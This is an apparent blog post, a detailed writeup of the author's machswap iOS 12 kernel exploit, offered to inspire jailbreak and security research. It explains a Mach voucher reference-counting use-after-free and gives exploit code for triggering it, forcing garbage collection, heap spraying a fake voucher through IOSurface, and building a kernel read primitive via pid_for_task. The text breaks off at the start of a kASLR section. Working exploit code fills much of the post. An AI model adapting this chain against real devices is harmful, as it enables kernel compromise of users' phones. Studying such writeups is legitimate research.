Jekyll2019-04-30T20:15:50+01:00https://sparkes.zone/blog/Psycho’s CornerI write about interesting things I do every now and again. Take a look around. You might learn something. MachSwap: an iOS 12 Kernel Exploit2019-04-30T01:00:00+01:002019-04-30T01:00:00+01:00https://sparkes.zone/blog/ios/2019/04/30/machswap-ios-12-kernel-exploit<p>Back at the end of January <a href="https://twitter.com/ibsparkes/status/1090337769300340742">I demo’d an early iOS 12 prototype jailbreak</a>, which included a homebrewed kernel exploit, root FS remount, and nonce setter. I achieved this in a little under two days with help from my good friends @S1guza, @littlelailo, and @stek29, making it one of the first iOS 12 prototype jailbreaks, before any public kernel exploits were released (subtle flex). About a month later I tidied up the source code and released the inital non-SMAP exploit under the name <a href="https://twitter.com/iBSparkes/status/1101213856087592960">machswap</a> (I later released an SMAP-compatible version, machswap2, which can also be found on my GitHub). I wanted to create a writeup detailing the bug and how the exploit works, in order to inspire and help others which are interested in iOS security research.</p>
<h2 id="looking-at-a-modern-ios-exploit">Looking at a modern iOS exploit</h2>
<p>On the 23rd of January 2019, security researcher <a href="https://twitter.com/S0rryMybad">@S0rryMybad</a> released a <a href="https://twitter.com/S0rryMybad/status/1087892194847907840">proof of concept exploit</a> for a kernel bug affecting iOS 12.1.2 and below. A little over five and a half hours later he followed it up with <a href="http://blogs.360.cn/post/IPC%20Voucher%20UaF%20Remote%20Jailbreak%20Stage%202.html">a Chinese blog post</a> describing the bug and possible exploitation techniques, and later an <a href="http://blogs.360.cn/post/IPC%20Voucher%20UaF%20Remote%20Jailbreak%20Stage%202%20(EN).html">English version</a>.</p>
<p>The bug is a user-after-free vulnerability which can be triggered from a sandboxed process on iOS, such as an app. It stems from a reference counting issue due to a poor implementation of a function within the kernel.</p>
<p>Before explaining the details of the bug, it’s important to understand a little about MIG, and the Mach subsystem in XNU (XNU is the kernel used on iOS, macOS, etc, devices).</p>
<h3 id="0x01-mach-mig-and-uafs">0x01 Mach, MIG, and UAF’s</h3>
<p>Mach is an IPC or “Inter-Process Communication” layer, which allows processes on a system to talk to one-another. This includes the kernel, as well as other system services and daemons which are responsible for handing specific tasks (for example, the userland daemon bluetoothd implements a Mach server, which can be accessed to set-up and manage bluetooth connections). It’s a postbox-like system which involves sending letters (Mach messages) between postboxes (Mach ports). Different postboxes (Mach ports) have different “rights”, for example you may only be able to send mail from some postboxes (a send right) whilst only being able to receive mail in others (a receive right). All postboxes have a specific address, in XNU this is known as a “handle”.</p>
<p>While it can be done, writing raw Mach code is a very tedious and time consuming process, and it’s easy to make mistakes which can potentially cause issues or create vulnerabilities within Mach server processes.</p>
<p>Therefore, Apple created a tool called MIG (“Mach Interface Generator”). It allows far quicker development of Mach interfaces, and is used all over iOS to design and handle Mach communication between both services and the kernel. When using MIG to generate Mach code, you can write definitions for functions you want to be able to access over the Mach API. “jailbreakd”, used in the Meridian and Electra jailbreaks, is one such example of a Mach server using MIG-generated code, and you can see the template used to generate the “jbd_call” function which jailbreakd implements here:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// mig -sheader jailbreak_daemonServer.h -header jailbreak_daemonUser.h mig.defs
subsystem jailbreak_daemon 500;
userprefix jbd_;
serverprefix jbd_;
WaitTime 2500;
#include <mach/std_types.defs>
#include <mach/mach_types.defs>
routine call(server_port : mach_port_t;
in command : uint8_t;
in pid : uint32_t);
</code></pre></div></div>
<p>This will expose a “jbd_call” function implemented within jailbreakd, which can then be accessed from any clients that wish to communicate with it. In this 3 arguments are provided to the server; the Mach port of the request, a byte which represents the command, and an unsigned 32-bit integer which represents the PID (Process ID) of the target process for jailbreakd to operate on.</p>
<p>MIG simply allows you to define this function, and will handle all of the raw Mach heavy lifting. This includes managing messages, reply ports, timeouts, and the lifetime or refcounts (reference counts) of objects. A “refcount” is simply a counter of how many places the object is being accessed or used from. Once an object reaches a reference count of zero, the object can be released, as there is no longer any code on the system using the object.</p>
<p>But is this always the case? A bug which allows an attacker to decrement the reference count more than intended often means the object can be released when it’s still being used by code; leading to a use-after-free (UAF) condition. This is often referred to as “dropping a ref”. “Releasing” in this case means the memory which the object is held in is “released” back to the allocator (a mechanism which manages memory allocations, in userland this is “malloc”, in kernel this is often “kalloc”) – this is also known as “freeing” the memory (hence the term use-after-free). This means the memory can then be re-allocated and used by other code for other purposes. However, if a piece of memory used by function “A” is released and then used by function “B”, this has the potential to cause interference to the workings of function “A”. It’s important to note that the object or memory allocation which has been UAF’d doesn’t have to be continuously used by a single function, the important thing is that the code using the released object still views it as “valid” and think it’s being used exclusively by that code, even if this is not the case as far as the allocator is concerned (ie; the allocator has released that memory and has now allocated it elsewhere).</p>
<p><em>From a more abstract standpoint, many bugs are based on the idea of mismatching states between two or more pieces of code or mechanisms. For example, with an integer overflow, you might want to mismatch the acutal size of an allocation with how large the code thinks the allocation is. If you consider the kernel as an incredibly large state machine, we’re effectively placing it into an unintended state where some code is using an allocation of memory whilst some other code (the allocator) is allowing that same memory to be re-used by other attacker-influenced code. It’s like walking up to a parking meter and pressing ↑↑↓↓←→←→BA in order to put the machine in a weird state and get a free parking ticket.</em></p>
<h3 id="0x02-the-vuln">0x02 The Vuln</h3>
<p>This leads us on to the vulnerability used in this kernel exploit. Let’s take a look at the following function:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>task_swap_mach_voucher(
task_t task,
ipc_voucher_t new_voucher,
ipc_voucher_t *in_out_old_voucher)
{
if (TASK_NULL == task)
return KERN_INVALID_TASK;
*in_out_old_voucher = new_voucher;
return KERN_SUCCESS;
}
</code></pre></div></div>
<p>Looks fairly simple, right? It simply swaps a voucher in a pointer with a new voucher. This function can be accessed from userland (ie. an iOS app) via the Mach API, and the call between kernel and userland is handled by MIG. However, let’s take a look at that MIG code:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> task = convert_port_to_task(In0P->Head.msgh_request_port);
/* increments by one */
new_voucher = convert_port_to_voucher(In0P->new_voucher.name);
/* increments by one */
old_voucher = convert_port_to_voucher(In0P->old_voucher.name);
RetCode = task_swap_mach_voucher(task, new_voucher, &old_voucher);
ipc_voucher_release(new_voucher); /* decrements by one */
task_deallocate(task);
if (RetCode != KERN_SUCCESS) {
MIG_RETURN_ERROR(OutP, RetCode);
}
if (IP_VALID((ipc_port_t)In0P->old_voucher.name))
ipc_port_release_send((ipc_port_t)In0P->old_voucher.name);
if (IP_VALID((ipc_port_t)In0P->new_voucher.name))
ipc_port_release_send((ipc_port_t)In0P->new_voucher.name);
/* decrements by one */
OutP->old_voucher.name = (mach_port_t)convert_voucher_to_port(old_voucher);
</code></pre></div></div>
<p><em>To generate this code, you can download the corresponding .defs file for the function from the XNU sources, and run the command <code class="highlighter-rouge">mig -DKERNEL -DKERNEL_SERVER mig.defs</code></em></p>
<p>At first glance, this code looks fine. Each voucher object has its refcount incremented by one, and then decremented by one. However, because of the MIG code having no understanding of what the kernel code (<code class="highlighter-rouge">task_swap_mach_voucher</code>) itself is doing, and vice-versa, this leads to an issue. After <code class="highlighter-rouge">task_swap_mach_voucher</code> is called, <code class="highlighter-rouge">old_voucher</code> and <code class="highlighter-rouge">new_voucher</code> will be equal (remember, <code class="highlighter-rouge">task_swap_mach_voucher</code> assigns <code class="highlighter-rouge">new_voucher</code> into <code class="highlighter-rouge">old_voucher</code>). Therefore, the refcount on <code class="highlighter-rouge">new_voucher</code> will be incremented once, and then decremented twice by both <code class="highlighter-rouge">ipc_voucher_release</code>, <em>and</em> <code class="highlighter-rouge">convert_voucher_to_port</code> (again, <code class="highlighter-rouge">old_voucher</code> is now equal to <code class="highlighter-rouge">new_voucher</code>). The refcount on <code class="highlighter-rouge">old_voucher</code> itself will also not be decremented at all. This leads us to the following proof of concept (PoC):</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> mach_voucher_attr_recipe_data_t atm_data =
{
.key = MACH_VOUCHER_ATTR_KEY_ATM,
.command = 510
};
mach_port_t p1;
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p1);
mach_port_t p2;
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p2);
mach_port_t p3;
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p3);
/*
We assign p1 (our target voucher) onto our thread so it can be accessed again later.
When we later try to retreive it
This will increment a ref on the voucher -- the current refcount is 2
*/
ret = thread_set_mach_voucher(mach_thread_self(), p1);
ret = task_swap_mach_voucher(mach_task_self(), p1, &p2); // Trigger the bug once, this drops a ref from 2 to 1
ret = task_swap_mach_voucher(mach_task_self(), p1, &p3); // Second trigger, this frees the voucher (refcnt=0)
/* Ask for a handle on the danging voucher, 9 times out of 10 this will cause a panic due to the bad refcnt etc */
mach_port_t real_port_to_fake_voucher = MACH_PORT_NULL;
ret = thread_get_mach_voucher(mach_thread_self(), 0, &real_port_to_fake_voucher);
</code></pre></div></div>
<p>Here we trigger the bug twice via the <code class="highlighter-rouge">task_swap_mach_voucher</code> call to drop two refs on the target voucher. This then leaves us with a pointer on our thread to a free’d voucher in kernel memory.</p>
<h3 id="0x03-beginning-our-exploitation">0x03 Beginning our Exploitation</h3>
<p>Once the voucher has been free’d we can then replace this with attacker-controlled data via a technique called “heap spraying”. The idea is to fill or “spray” the kernel heap (a place in a program in which allocations managed by the allocator are created and destroyed) to overwrite the now-free’d voucher with our own data. If this is done successfully, we would then have the voucher pointer in our thread pointing to our arbitrary voucher struct, and we could use the <code class="highlighter-rouge">thread_get_mach_voucher</code> function to get a userland handle on that voucher, which can then be passed to Mach API’s to gain new attack primitives.</p>
<p>The <code class="highlighter-rouge">ipc_voucher</code> struct is defined as follows:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct ipc_voucher {
iv_index_t iv_hash; /* checksum hash */
iv_index_t iv_sum; /* checksum of values */
os_refcnt_t iv_refs; /* reference count */
iv_index_t iv_table_size; /* size of the voucher table */
iv_index_t iv_inline_table[IV_ENTRIES_INLINE];
iv_entry_t iv_table; /* table of voucher attr entries */
ipc_port_t iv_port; /* port representing the voucher */
queue_chain_t iv_hash_link; /* link on hash chain */
};
</code></pre></div></div>
<p>We can see the <code class="highlighter-rouge">iv_refs</code> field which contains the reference count which we dropped, and importantly, a pointer to an <code class="highlighter-rouge">ipc_port_t</code> in <code class="highlighter-rouge">iv_port</code>. This <code class="highlighter-rouge">ipc_port_t</code> struct is the kernel representation of a generic Mach port. In this case, the <code class="highlighter-rouge">ipc_voucher</code> implements the <code class="highlighter-rouge">ipc_port_t</code> as a field whilst implementing some of its own attributes (for example, <code class="highlighter-rouge">iv_table</code> and <code class="highlighter-rouge">iv_inline_table</code>).</p>
<p>One important thing to note about the voucher port is that it doesn’t have a receive right. In Mach, ports can have send and receive rights. If the port has a send right you can send messages on that port, and if the port has a receive right you can receive messages on that port. Since we have no receive right here, this means the exploit strays slightly from the de-facto exploitation (ie. v0rtex). However, the same results can still be achieved by using slightly different primitives – this will come into play later.</p>
<p>When we perform our heap spray we want to spray these <code class="highlighter-rouge">ipc_voucher</code> structs onto the kernel heap and replace the free’d voucher struct with an arbitrary one. The main goal is to gain control of the <code class="highlighter-rouge">iv_port</code> field, and point that into an attacker controlled <code class="highlighter-rouge">ipc_port</code>. This is the basis of how many Mach API-based exploitation techniques work: get a userland handle onto an attacker-controlled <code class="highlighter-rouge">ipc_port</code> which is “theoretically” owned and managed by the kernel.</p>
<p>This is where the “non-SMAP” element of this exploit comes into play. Typically, on SMAP devices (A10 and newer), the kernel is unable to access memory in userland. SMAP (Supervisor Mode Access Prevention) is implemented to stop attackers providing userland allocations when attacking the kernel which can directly be modified in userland without any special tricks. However, on non-SMAP devices (<=A9), we are still able to abuse this technique when performing exploitation (SMAP has to be implemented in hardware, and therefore can’t be backported to older firmwares via updates).</p>
<p>In this case, we can spray an <code class="highlighter-rouge">ipc_voucher</code> struct, where the <code class="highlighter-rouge">iv_port</code> field contains a pointer to an <code class="highlighter-rouge">ipc_port</code> allocated in userland. This means the kernel will use our <code class="highlighter-rouge">ipc_port</code> as if it had been created and allocated in kernelspace, when in fact it has been allocated in userland and can be manipulated and updated by us directly. Here is the code in the exploit which sets up this voucher:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kport_t *fakeport = malloc(0x4000);
mlock((void *)fakeport, 0x4000);
bzero((void *)fakeport, 0x4000);
fakeport->ip_bits = IO_BITS_ACTIVE | IKOT_TASK;
fakeport->ip_references = 100;
fakeport->ip_lock.type = 0x11;
fakeport->ip_messages.port.receiver_name = 1;
fakeport->ip_messages.port.msgcount = 0;
fakeport->ip_messages.port.qlimit = MACH_PORT_QLIMIT_LARGE;
fakeport->ip_messages.port.waitq.flags = mach_port_waitq_flags();
fakeport->ip_srights = 99;
LOG("fakeport: 0x%llx", (uint64_t)fakeport);
/* the fake voucher to be sprayed */
fake_ipc_voucher_t fake_voucher = (fake_ipc_voucher_t)
{
.iv_hash = 0x11111111,
.iv_sum = 0x22222222,
.iv_refs = 100,
.iv_port = (uint64_t)fakeport
};
</code></pre></div></div>
<p>You can see we create a fake <code class="highlighter-rouge">ipc_voucher</code> which contains 100 refs (this is so the object will never prematurely be destroyed), and the <code class="highlighter-rouge">iv_port</code> field contains a pointer directly to our userland <code class="highlighter-rouge">fakeport</code> object.</p>
<p>Now we need to spray this object into kernel memory. However; there is a slight problem, and that is related to the “kalloc” allocator and “kalloc zones”.</p>
<h3 id="0x04-borachio-and-the-climate-control-team-abusing-gc">0x04 Borachio and the Climate Control Team (Abusing GC)</h3>
<p>Kalloc, the XNU allocator which is used to allocate our ipc_voucher struct which we have UAF’d, uses a series of “zones” to allocate objects into. These are sections of heap memory which only contain a specific size or type of object. For example, the kalloc.32 zone contains objects which are <=32 bytes in size (however >16 bytes, as this is the next smallest zone). You can take a look at some of these zones by using the “zprint” command on an OSX or iOS system:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo zprint | awk 'NR<=3 || /kalloc|ipc.ports/'
elem cur max cur max cur alloc alloc
zone name size size size #elts #elts inuse size count
-------------------------------------------------------------------------------------------------------------
kalloc.16 16 12592K 13301K 805888 851264 802478 4K 256 C
kalloc.32 32 3652K 3941K 116864 126113 113244 4K 128 C
kalloc.48 48 5952K 8867K 126976 189169 121315 4K 85 C
kalloc.64 64 9212K 13301K 147392 212816 145701 4K 64 C
kalloc.80 80 2988K 3941K 38246 50445 37847 4K 51 C
kalloc.96 96 1496K 1556K 15957 16607 15011 8K 85 C
kalloc.128 128 5400K 5911K 43200 47292 41427 4K 32 C
kalloc.160 160 1432K 1556K 9164 9964 7958 8K 51 C
kalloc.192 192 876K 1037K 4672 5535 4520 12K 64 C
kalloc.224 224 9488K 10509K 43373 48043 36239 16K 73 C
kalloc.256 256 2912K 3941K 11648 15764 10799 4K 16 C
kalloc.288 288 3260K 3892K 11591 13839 10416 20K 71 C
kalloc.368 368 3488K 4151K 9705 11553 8810 32K 89 C
kalloc.400 400 2640K 3892K 6758 9964 5665 20K 51 C
kalloc.512 512 3636K 3941K 7272 7882 6848 4K 8 C
kalloc.576 576 212K 345K 376 615 290 4K 7 C
kalloc.768 768 2676K 3503K 3568 4670 3009 12K 16 C
kalloc.1024 1024 3716K 5911K 3716 5911 3503 4K 4 C
kalloc.1152 1152 320K 461K 284 410 200 8K 7 C
kalloc.1280 1280 1040K 1153K 832 922 723 20K 16 C
kalloc.1664 1664 700K 717K 430 441 399 28K 17 C
kalloc.2048 2048 932K 1167K 466 583 456 4K 2 C
kalloc.4096 4096 4816K 13301K 1204 3325 1140 4K 1 C
kalloc.6144 6144 16704K 26602K 2784 4433 2628 12K 2 C
kalloc.8192 8192 1536K 5254K 192 656 187 8K 1 C
ipc.ports 168 5580K 18660K 34011 113737 33156 12K 73 C
</code></pre></div></div>
<p><em>The appended <code class="highlighter-rouge">awk</code> command will print the first 3 lines of the zprint output (the table header), as well as any lines which contain ‘kalloc’ or ‘ipc.ports’</em></p>
<p><em>Note: the output will vary slightly between an iOS and OSX system. For example, there are some differences in the kalloc zones. This output was dumped from an OSX system.</em></p>
<p>In this list we can see all of the kalloc zones, as well as a special zone called ‘ipc.ports’. This is a zone which any ipc ports are allocated into – including our ipc_voucher. There are no primitives which allow spraying arbitrary data into the ipc.ports zone, so in order to spray the page containing our free’d port we first need to release the page in the ipc.ports zone back to the allocator, and then re’alloc it into a kalloc zone (which <em>can</em> be sprayed into). This can be done via the GC (Garbage Collect) mechanism. Triggering GC will release any unused pages back to the allocator.</p>
<p>On iOS 10 and older, this mechanism could be triggered via Mach call to the kernel. However, in iOS 11, this functionality was removed, so attackers must now trigger it manually via many methods. In Siguza’s <a href="https://siguza.github.io/v0rtex/">v0rtex writeup</a>, he described one method of doing so:</p>
<blockquote>
<p>[…] you should still be able to trigger a garbage collection by iterating over all zones, allocating and subsequently freeing something like 100MB in each, and measuring how long it takes to do so - garbage collection should be a significant spike</p>
</blockquote>
<p>Hence the following function. Here we allocate a message which will be sent into the kalloc.16384 zone, and send it (via the <code class="highlighter-rouge">send_kalloc_message</code> function) 256 times, recording the amount of time it takes for each. If sending these messages takes longer than 1,000,000 nanoseconds (1 millisecond), we can assume GC has been triggered.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void trigger_gc_please()
{
[...]
uint32_t body_size = message_size_for_kalloc_size(16384) - sizeof(mach_msg_header_t); // 1024
uint8_t *body = malloc(body_size);
memset(body, 0x41, body_size);
for (int i = 0; i < gc_ports_cnt; i++)
{
uint64_t t0, t1;
t0 = mach_absolute_time();
gc_ports[i] = send_kalloc_message(body, body_size);
t1 = mach_absolute_time();
if (t1 - t0 > 1000000)
{
LOG("got gc at %d -- breaking", i);
gc_ports_max = i;
break;
}
}
[...]
sched_yield();
sleep(1);
}
</code></pre></div></div>
<p>Whilst machswap is a particularly fast exploit – this is the slowest part due to its importance. If triggering GC fails, the page will not be released, and our heap spray will fail, hence causing the entire exploit to fail. Since GC works asynchronously (at the same time as other code), we need to wait some time to ensure GC has completed. Hence the inclusion of the <code class="highlighter-rouge">sched_yield</code> and <code class="highlighter-rouge">sleep</code> calls in the epilogue of this function.</p>
<p>An important factor of GC that must be taken into consideration is that <em>all</em> objects on a given page must be released before the page itself can be released. This means there cannot be a single allocation existing on the same page as our target UAF voucher. To combat this, 0x2000 ports are allocated before our target “p1”, and a further 0x1000 after. See the following code:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> /* allocate 0x2000 vouchers to alloc some new fresh pages */
for (int i = 0; i < 0x2000; i++)
{
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &before[i]);
}
/* alloc our target uaf voucher */
mach_port_t p1;
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p1);
/* allocate 0x1000 more vouchers */
for (int i = 0; i < 0x1000; i++)
{
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &after[i]);
}
/*
theoretically, we should now have 3 blocks of memory (roughly) as so:
|--------------------|-------------|------------------|
| ipc ports | target port | more ipc ports |
|--------------------|-------------|------------------|
^ ^
page with only our controlled ports
hopefully our target port is now allocated on a page which contains only our
controlled ports. this means when we release all of our ports *all* allocations
on the given page will be released, and when we trigger GC the page will be released
back from the ipc_ports zone to be re-used by kalloc
this allows us to spray our fake vouchers via IOSurface in other kalloc zones
(ie. kalloc.1024), and the dangling pointer of the voucher will then overlap with one
of our allocations
*/
</code></pre></div></div>
<p>After triggering the UAF bug and releasing the target port, we can then release all of our controlled ports and then continue in attempting to trigger GC.</p>
<h3 id="0x05-a-heap-spray-for-your-sprog">0x05 A Heap Spray for your Sprog</h3>
<p>Assuming all has gone to plan, by this point GC will have been triggered, and our page released back to the allocation pool. We can then continue with our heap spray in order to send our fake voucher into kernel and replace the free’d voucher. For this we can make use of an IOKit UserClient implemented in the “IOSurface” kext (kernel extension). IOKit is a kernel interface for handing drivers and extensions, and a user client is an object while allows a user to issue commands to a kernel extension. IOSurface is a kext designed for handling and performing calculations on graphical buffers, however it also provides a great heap spraying primitive for us, for two reasons. Firstly, IOSurface (specifically the “set value” method) allows us to provide an encoded plist (property list) containing objects such as array’s (OSArray), dictionaries (OSDictionary), strings (OSStrings), etc. Within these objects we can place completely arbitrary data (including nesting types, ie. a dictionary inside of an array). Secondly, the IOSurface userclient is accessible from the app sandbox, as there are no entitlement or permission checks, or blocks from the sandbox. To spray our data, we can create a surface consisting of OSString’s to spray our data. We set up a single Surface, and then use an array containing a single dictionary, where each entry contains one of the OSString’s we want to spray. An OSString can be any size, however we want to fill entire pages of memory with our data. On 4k devices, the pagesize is 0x1000 (4096), and on 16k devices, 0x4000 (16,384). Due to the “string” part of OSString, our data must be terminated with a NULL byte, so we need to account for this in our size calculations. The code below sets up the data which will be set onto the surface (and hence sprayed into kernel memory), with the bcopy loop then filling each of our OSString’s with our fake ipc_vouchers.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define FILL_MEMSIZE 0x4000000
int spray_qty = FILL_MEMSIZE / pagesize; // # of pages to spray
int spray_size = (5 * sizeof(uint32_t)) + (spray_qty * ((4 * sizeof(uint32_t)) + pagesize));
uint32_t *spray_data = malloc(spray_size); // header + (spray_qty * (item_header + pgsize))
bzero((void *)spray_data, spray_size);
uint32_t *spray_cur = spray_data;
/*
+-> Surface
+-> Array
+-> Dictionary
+-> OSString
+-> OSString
+-> OSString
etc (spray_qty times)...
*/
*(spray_cur++) = surface->id;
*(spray_cur++) = 0x0;
*(spray_cur++) = kOSSerializeMagic;
*(spray_cur++) = kOSSerializeEndCollection | kOSSerializeArray | 1;
*(spray_cur++) = kOSSerializeEndCollection | kOSSerializeDictionary | spray_qty;
for (int i = 0; i < spray_qty; i++)
{
*(spray_cur++) = kOSSerializeSymbol | 5;
*(spray_cur++) = transpose(i);
*(spray_cur++) = 0x0;
*(spray_cur++) = (i + 1 >= spray_qty ? kOSSerializeEndCollection : 0) | kOSSerializeString | (pagesize - 1);
for (uintptr_t ptr = (uintptr_t)spray_cur, end = ptr + pagesize;
ptr + sizeof(fake_ipc_voucher_t) <= end;
ptr += sizeof(fake_ipc_voucher_t))
{
bcopy((const void *)&fake_voucher, (void *)ptr, sizeof(fake_ipc_voucher_t));
}
spray_cur += (pagesize / sizeof(uint32_t));
}
</code></pre></div></div>
<p>We can then make a call to the userclient to set the provided data onto the Surface:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> uint32_t dummy = 0;
size = sizeof(dummy);
ret = IOConnectCallStructMethod(client, IOSURFACE_SET_VALUE, spray_data, spray_size, &dummy, &size);
if(ret != KERN_SUCCESS)
{
LOG("setValue(prep): %s", mach_error_string(ret));
goto out;
}
</code></pre></div></div>
<p>If this has worked correctly, our free’d ipc_voucher will have now been replaced with our fake voucher which we have copied onto kernel memory via our heap spray. This means the port stashed on our thread will now point to our fake <code class="highlighter-rouge">ipc_voucher</code>, which points to our fake <code class="highlighter-rouge">ipc_port</code>, which is allocated in userland as <code class="highlighter-rouge">fakeport</code>. We now attempt to get a handle onto this voucher/port, via the <code class="highlighter-rouge">thread_get_mach_voucher</code> call:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> mach_port_t real_port_to_fake_voucher = MACH_PORT_NULL;
/* fingers crossed we get a userland handle onto our 'fakeport' object */
ret = thread_get_mach_voucher(mach_thread_self(), 0, &real_port_to_fake_voucher);
LOG("port: %x", real_port_to_fake_voucher);
/* things are looking good; should be 100% success rate from here */
LOG("WE REALLY POSTED UP ON THIS BLOCK");
mach_port_t the_one = real_port_to_fake_voucher;
</code></pre></div></div>
<p>From here, things are looking good. Assuming our port is infact valid, we should have a 100% success rate from this point – the dangerous parts are now over.</p>
<h3 id="0x06-eavesdropping-kernel-memory-building-a-read-primitive">0x06 Eavesdropping Kernel Memory: Building a Read Primitive</h3>
<p>We can now start to build our first read primitive which we can use to read important pointers in the kernel’s memory – these are later used in setting up our fake kernel task struct.</p>
<p>Typically, I would recommend setting up a read primitive via the <code class="highlighter-rouge">mach_port_get_attributes</code> Mach call, as demonstrated in the v0rtex exploit. This call implements proper locking on the port, However, due to the aformentioned lack of receive right, this is not possible. Instead, we will use an older but more common technique with regard to Mach-based exploitation; the <code class="highlighter-rouge">pid_for_task</code> primitive. The Mach API implements a function called “pid_for_task”, which will return the pid of a process of whom’s task port you provide. Here is the (heavily stripped) kernel code:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pid_for_task(
struct pid_for_task_args *args)
{
mach_port_name_t t = args->t;
user_addr_t pid_addr = args->pid;
[...]
t1 = port_name_to_task_inspect(t);
[...]
p = get_bsdtask_info(t1); /* Get the bsd_info entry from the task */
if (p) {
pid = proc_pid(p); /* Returns p->p_pid */
err = KERN_SUCCESS;
} [...]
(void) copyout((char *) &pid, pid_addr, sizeof(int));
return(err);
}
</code></pre></div></div>
<p>You can see <code class="highlighter-rouge">get_bsdtask_info</code> is called on the task port we provide, and then the resulting pid from <code class="highlighter-rouge">proc_pid</code> is copied back to userland. The important thing here is that no checks are performed on the validity of the provided task port nor the proc which is returned from <code class="highlighter-rouge">get_bsdtask_info</code> (even so, such checks would be futile against this primitive). Let’s look at <code class="highlighter-rouge">get_bsdtask_info</code> and <code class="highlighter-rouge">proc_pid</code>:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void *get_bsdtask_info(task_t t)
{
/* ldr x0, [x0, #0x358]; ret */
return(t->bsd_info);
}
int
proc_pid(proc_t p)
{
if (p != NULL)
/* ldr w0, [x0, #0x60]; ret */
return (p->p_pid);
return -1;
}
</code></pre></div></div>
<p>In essence, via this call, we can retrieve the value of <code class="highlighter-rouge">task->bsd_info->p_pid</code>. Since we have control over the <code class="highlighter-rouge">task</code> struct (this is a field within our fakeport), we have full control of the address which <code class="highlighter-rouge">bsd_info</code> points to. Therefore, by manipulating the <code class="highlighter-rouge">bsd_info</code> pointer, we can get a 32-bit read (as p_pid is a 32-bit int, and the value is loaded into the ‘w’ register) of any kernel address we require. If we need to read a 64-bit value, we can use two adjacent 32-bit reads and later combine the values to calculate the original value.</p>
<p>We first allocate a fake task object which resides in the <code class="highlighter-rouge">ip_kobject</code> field of our fakeport. We also set the <code class="highlighter-rouge">ip_bits</code> field of our fakeport to <code class="highlighter-rouge">IO_BITS_ACTIVE | IKOT_TASK</code> – this marks our ipc_port as a port which represents a task, allowing us to use calls such as <code class="highlighter-rouge">pid_for_task</code> on it.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ktask_t *fake_task = (ktask_t *)malloc(0x600); // task is about 0x568 or some shit
bzero((void *)fake_task, 0x600);
fake_task->ref_count = 0xff;
uint64_t *read_addr_ptr = (uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_bsd_info);
fakeport->ip_kobject = (uint64_t)fake_task;
</code></pre></div></div>
<p>The read_addr_ptr points to our bsd_info pointer which we can overwrite with arbitrary kernel addresses. We then implement our 32bit read primitive as so:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define rk32(addr, value)\
*read_addr_ptr = addr - offsets->struct_offsets.proc_pid;\
value = 0x0;\
ret = pid_for_task(the_one, (int *)&value);
</code></pre></div></div>
<p>Note the <code class="highlighter-rouge">addr - offsets->struct_offsets.proc_pid</code>. This is because when the <code class="highlighter-rouge">p_pid</code> field is accessed within the <code class="highlighter-rouge">bsd_info</code> struct, it will add the offset of <code class="highlighter-rouge">struct_offsets.proc_pid</code> to the <code class="highlighter-rouge">bsd_info</code> pointer before performing the read. We therefore subtract this value to account for this and read the correct data.</p>
<p>As previosuly noted, we can combine adjacent 32bit values for a full 64bit read:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define rk64(addr, value)\
rk32(addr + 0x4, read64_tmp);\ /* Read the higher */
rk32(addr, value);\ /* Read the lower */
value = value | ((uint64_t)read64_tmp << 32) /* Shift the higher by 32bits to the left and OR against the lower bits */
</code></pre></div></div>
<p>We now have a working read primitive based on our fakeport and newly-allocated fake task struct.</p>
<h3 id="0x07-defeating-kaslr">0x07 Defeating kASLR</h3>
<p>ASLR (Address Space Layout Randomization) is a mitigation used to make exploitation of software harder by shifting all the static data within a program’s address space by a constant but randomized value (hence the “random” element). In the kernel, this is used to shift all of the static regions (__TEXT, __DATA.__const, etc) from a static base value to a higher, random memory location. It’s important to derive this value (known as the kernel “slide”) as it is commonly used by jailbreaks in order to read and write data from static offsets, and call functions in kernel <code class="highlighter-rouge">__TEXT</code>.</p>
<p>The first thought that may come to mind when learning about kASLR is simply “can it be brute forced”? In the typical sense of simply trying to read from every possible base address until you get some data, the answer is no. This is due to the fact that the kernel slide can vary by a huge amount, and when attempting to read from every address you would likely hit an unmapped region. If the kernel tries to read from an unmapped region a fault is triggered ending in a panic. This would hugely decrease the success rate of the exploit, as you would be relying on a near perfect guess of where the kernel image is located in memory. Here is the code used to derive the kernel base address, courtesy of the <a href="https://www.theiphonewiki.com/wiki/Kernel_ASLR">iPhoneWiki</a>:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> base = 0x01000000 + (slide_byte * 0x00200000)
</code></pre></div></div>
